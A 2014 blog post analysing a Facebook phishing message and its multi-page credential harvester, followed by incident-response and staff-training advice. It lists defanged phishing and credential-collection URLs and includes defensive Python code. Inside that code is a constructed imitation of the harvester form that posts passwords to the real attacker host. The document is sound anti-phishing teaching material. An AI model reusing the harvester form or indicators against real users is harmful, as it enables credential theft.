Wednesday, August 13, 2014

Facebook Message Phishing Analysis Response



Someone got this Facebook phishing attempt the other day. Let's check it out. First I'll explain some tell-tale signs that make this a phishing attempt, then I'll address the response. All I have to start with is a screenshot.


message screenshot:

[screenshot omitted: the phishing message as received]
A good first check to see if something is malicious is to Google the message text in quotes, usually just the first ten words or so. Think of it as crowdsourcing the reputation of something; it works well with a text message, an email message, or even the title of a piece of software. When the first few pages of results all describe a scam, that is strong evidence the message is malicious. The reverse does not hold: no results may only mean the campaign is new or the wording was changed, so silence is not a clean bill of health. Below you will see the results, with all ten hits describing a phishing attempt or scam.

google-search: "your account has been reported by other users, and"

[screenshot of the search results omitted]
One thing that makes this message suspicious is the odd characters in the sender name "Message Facebook". This is supposed to be the user who sent the message, so an account was probably hacked or created for the purpose, and the sender used look-alike characters from another script for the user name to get past Facebook's filters. Another possibility is that someone is injecting messages, perhaps through a replay attack, but I haven't researched this.

Assume the message is real and think about the language: "If you still want to use your account, please confirm your facebook account below." One, Facebook's own copy would not spell its brand in lowercase; editors would fix that. Two, the logic does not hold: why would I need to confirm my account when it has either been hacked by criminals, I am violating the rules on purpose, or I accidentally violated the rules? Confirming my account does not help or change anything from Facebook's point of view. A confirmation of an account should go through a predefined channel that only the user has access to, like the email address or mobile number on file, not a link in a message.

Another tip-off is the URL, which is not a Facebook domain. The registrable domain is ucoz.org, a free site-builder host, and "Facebook" appears only in the path, which anyone can choose:
hxxp://sadasdw[dot]ucoz[dot]org/Help_Confirm_Your_Facebook_Account[dot]user[dot]htm
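As an added example (my code, not part of the original post), here is a small Python check that undoes the defanging used above and tests whether a URL's registrable domain belongs to Facebook. The allow-list of Facebook domains and the two-label domain heuristic are my assumptions; apart from the URL from the message, the bait URLs are constructed to show the usual tricks (brand name in the path, brand name as a subdomain, brand name in the userinfo before "@").

```python
from urllib.parse import urlsplit

# Assumption: registrable domains Facebook actually owns. Extend for your
# environment; anything not on this list is treated as not Facebook.
FACEBOOK_DOMAINS = {"facebook.com", "fb.com", "messenger.com"}


def refang(url: str) -> str:
    """Undo the hxxp / [dot] defanging used in write-ups so the URL parses."""
    return (url.replace("hxxps://", "https://")
               .replace("hxxp://", "http://")
               .replace("[dot]", ".")
               .replace("[.]", "."))


def registrable_domain(host: str) -> str:
    """Last two labels of the host name, e.g. sadasdw.ucoz.org -> ucoz.org.

    A two-label heuristic is wrong for suffixes like co.uk; production code
    should consult the Public Suffix List instead.
    """
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def is_facebook_url(url: str) -> bool:
    """True only when the host's registrable domain is one Facebook owns.

    urlsplit().hostname strips any user:pass@ prefix and :port, so a bait
    like https://www.facebook.com@evil.example/ resolves to evil.example.
    Brand words in the path or in a subdomain are ignored on purpose.
    """
    host = urlsplit(refang(url)).hostname or ""
    return registrable_domain(host) in FACEBOOK_DOMAINS


def verdict(url: str) -> str:
    """One-line triage verdict for a URL pasted out of a message."""
    host = urlsplit(refang(url)).hostname or "?"
    label = "ok" if is_facebook_url(url) else "SUSPICIOUS"
    return f"{label:10} host={host} registrable={registrable_domain(host)}"


if __name__ == "__main__":
    samples = [
        # the URL from the message analysed in this post
        "hxxp://sadasdw[dot]ucoz[dot]org/Help_Confirm_Your_Facebook_Account[dot]user[dot]htm",
        # constructed look-alikes illustrating common tricks
        "https://www.facebook.com.security-check.example/login",   # brand as subdomain
        "https://www.facebook.com@evil.example/login",             # brand in userinfo
        "https://evil.example/www.facebook.com/login.php",         # brand in path
        # a real Facebook URL for comparison
        "https://www.facebook.com/help/",
    ]
    for s in samples:
        print(verdict(s))
```

The point of the check is that only the registrable domain counts; everything to its left, in the path, or before an "@" is attacker-controlled text.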

Checking whois, we see the registrant is Compubyte Limited in the British Virgin Islands. That is a provider operating the free site-builder platform, not the phisher; anyone can create a subdomain there, so whois tells us nothing about the attacker. Move on.

Another safe way to look at a site is the Wayback Machine, which stores archived copies of pages as a historical reference, so you can inspect a page (including its archived HTML) without touching the live host. It is of limited use for phishing because such pages are usually taken down before they are crawled, but it is worth a look. In this case the Wayback Machine gives no results because of robots.txt, meaning the site asked web crawlers not to index it, and the archive honored that at the time.

Visiting the site (do this from an isolated VM or sandbox, never from your own workstation) reveals an old credential harvester hosted on a free site builder. It posts the captured data to a script on another free host and loads trackers from several more:
credentials posted to = hxxp://rahmat02[dot]altervista[dot]org/gowa/
visitor statistics = hxxp://openstat[dot]net/ and hxxp://mc[dot]yandex[dot]ru/watch/
hit counter = hxxp://counter[dot]yadro[dot]ru/hit
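To show how those destinations can be pulled out of a harvester page without rendering or executing anything, here is an added Python example (my code, not the kit's and not from the original post). The HTML below is a constructed, stripped-down imitation of such a page; the only real details in it are the hosts listed above, and the markup and field names are made up. The parser finds where the form posts credentials, counts password fields, lists every third-party host the page loads, and defangs the output so the indicators can be pasted into a report safely.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed sample, not the real kit's source: a stripped-down imitation of
# the harvester page described in the post. Only the destination hosts are
# the ones the post reports; markup and field names are made up.
PAGE_URL = "http://sadasdw.ucoz.org/Help_Confirm_Your_Facebook_Account.user.htm"
SAMPLE_HTML = """
<html><head><title>Help Confirm Your Facebook Account</title>
<script src="http://openstat.net/"></script>
</head><body>
<form method="post" action="http://rahmat02.altervista.org/gowa/">
  Email: <input name="email">
  Password: <input type="password" name="pass">
  <input type="submit" value="Confirm">
</form>
<img src="http://mc.yandex.ru/watch/" width="1" height="1">
<img src="http://counter.yadro.ru/hit" width="1" height="1">
</body></html>
"""

# Which attribute carries the remote resource for each tag we care about.
RESOURCE_ATTR = {"script": "src", "img": "src", "iframe": "src", "link": "href"}


class HarvesterRefs(HTMLParser):
    """Collect form targets, password fields and third-party resource hosts."""

    def __init__(self, base_url: str):
        super().__init__()
        self.base_url = base_url
        self.base_host = urlsplit(base_url).hostname
        self.form_actions: list[str] = []
        self.password_fields = 0
        self.third_party_hosts: set[str] = set()

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            # A missing action means the form posts back to the page itself.
            self.form_actions.append(urljoin(self.base_url, a.get("action") or ""))
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.password_fields += 1
        attr = RESOURCE_ATTR.get(tag)
        if attr and a.get(attr):
            host = urlsplit(urljoin(self.base_url, a[attr])).hostname
            if host and host != self.base_host:
                self.third_party_hosts.add(host)


def defang(s: str) -> str:
    """Render a URL or host so it cannot be clicked by accident (hxxp, [dot])."""
    return s.replace("http", "hxxp").replace(".", "[dot]")


def triage(html: str, page_url: str) -> dict:
    """Static triage of a suspected credential harvester page."""
    p = HarvesterRefs(page_url)
    p.feed(html)
    p.close()
    off_site = [u for u in p.form_actions if urlsplit(u).hostname != p.base_host]
    return {
        "password_fields": p.password_fields,
        "form_actions": [defang(u) for u in p.form_actions],
        "credentials_leave_site": bool(off_site),
        "third_party_hosts": sorted(defang(h) for h in p.third_party_hosts),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_HTML, PAGE_URL).items():
        print(f"{key:24} {value}")
```

A form with a password field whose action points at a different host than the page itself is the signature of a harvester; the third-party host list gives you the tracker and counter infrastructure to block or hunt for in proxy logs.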

To help you understand what a credential harvester looks like, below are screenshots of the entire process.

[screenshots omitted: a series of forms asking for email and web mail credentials, date of birth, security question and answer, credit card and billing details, and finally the Facebook login]
Entering info on the last page redirects you to the real Facebook login, so the victim sees nothing out of the ordinary.

This is an old harvester and probably auto-generated. There are ways of creating much better harvesters that look almost exactly like the real Facebook, so a polished page is not proof of legitimacy. Now you are aware of what a harvester can look like, so you can avoid being duped.

_________________________________________________________________________________

Incident Response


Now you, your kids, or someone in your company has made a boo-boo: they went to the site and filled out all the questions. What do you do?

  1. Praise whoever reported the incident, particularly if it was the person who fell for the phish.
  2. Make detailed notes of all information "lost", meaning information we lost control of that we otherwise shouldn't have. Below is the list for this example.
    1. email address
    2. email password
    3. web mail client
    4. web mail password
    5. date of birth
    6. security question and answer
    7. country
    8. first and last name
    9. credit card number
    10. credit card type
    11. credit card expire date
    12. credit card security code
    13. billing address
    14. billing country
    15. Facebook login
    16. Facebook password
  3. Now remove the items that are public or can't be changed. Below are the items we will remove from the list, why not to respond, and some alternative measures that will better protect you.
    1. email address
      1. Even if you go to great lengths to hide your personal or business email address, it is still effectively public, so migrating to a new address is overkill. Do expect more phishing to that address, since the attacker has now confirmed it is live.
    2. web mail client
      1. Knowing which web mail client you use can open avenues for social engineering and vulnerability exploits, but hiding what you use will not stop the attack. Instead, focus on recognizing when the topic comes up over the phone, in email, or in any other communication where the speaker is not immediately identifiable.
      2. Keeping the client patched and monitored reduces the risk that a known vulnerability is exploited.
    3. date of birth
      1. Your date of birth is public information with several databases keeping track of it, and your mother cannot re-birth you, so there is nothing to change here. It is, however, a common identity-verification field, so treat its loss as one more reason to watch your accounts.
    4. country
      1. The country you are in is public information.
    5. first and last name
      1. Your name is public information; nothing to do here.
    6. billing address
      1. Your billing address is public information and moving is overkill, but keep an eye on your credit report and bank accounts; see Check Your Accounts.
    7. billing country
      1. The country you are in is public information, and moving to Timbuktu is a little crazy.
    8. Facebook login
      1. At the time of this post you cannot change your Facebook login, so instead change your Facebook settings to show a different email address publicly and use a private address only for logging in.
  4. The above list is little to worry about; below are the major concerns for this situation. Change or report every one of them as stolen, from a device you trust, and change the same password anywhere else you reused it. Reporting the card stolen takes care of its number, expiry date and security code together; the card type cannot be hidden and only matters in combination with the rest.
    1. email password
    2. web mail password
    3. security question and answer
      1. Regarding the security question, this is a good example of why I recommend making up the answer to every security question and never reusing the same question and answer pair across sites; see How to Choose a Password.
    4. credit card number
    5. credit card type
    6. credit card  expire date
    7. credit card security code
    8. Facebook password
  5. Now that the incident is mitigated we need to concentrate on the final step, continuing education. Below are some suggestions for education in an enterprise setting.
I like the idea of involving the person who was phished, because making the incident as personal as possible motivates people to do the right thing: report incidents. The only approach I've seen do better is when the person who usually gives the class is very entertaining.

Teach the person who was phished enough detail to give a 10-minute class on the incident, including some technical and personal advice. They will be nervous giving a class, so the Security Engineer, Officer, or Analyst should be supportive at all times and act as a teaching lead to answer complicated questions and keep the class moving. Most of all, keep it simple, generalize the situation (don't include security-sensitive details), and record the class for future use.

In my experience people remember more and respond better to a fellow employee giving the class. If the same Security Engineer, Officer, or Analyst always gives the classes it becomes a mundane task, which leads to blank stares.

To make it more personal, relate the situation to home use for company personnel. When possible, allow employees to share the class video with their families. The more you show people how it can affect them at home, the better.





____________________________________________________________________________

Thanks for reading my post. You can find me at any of the links below.
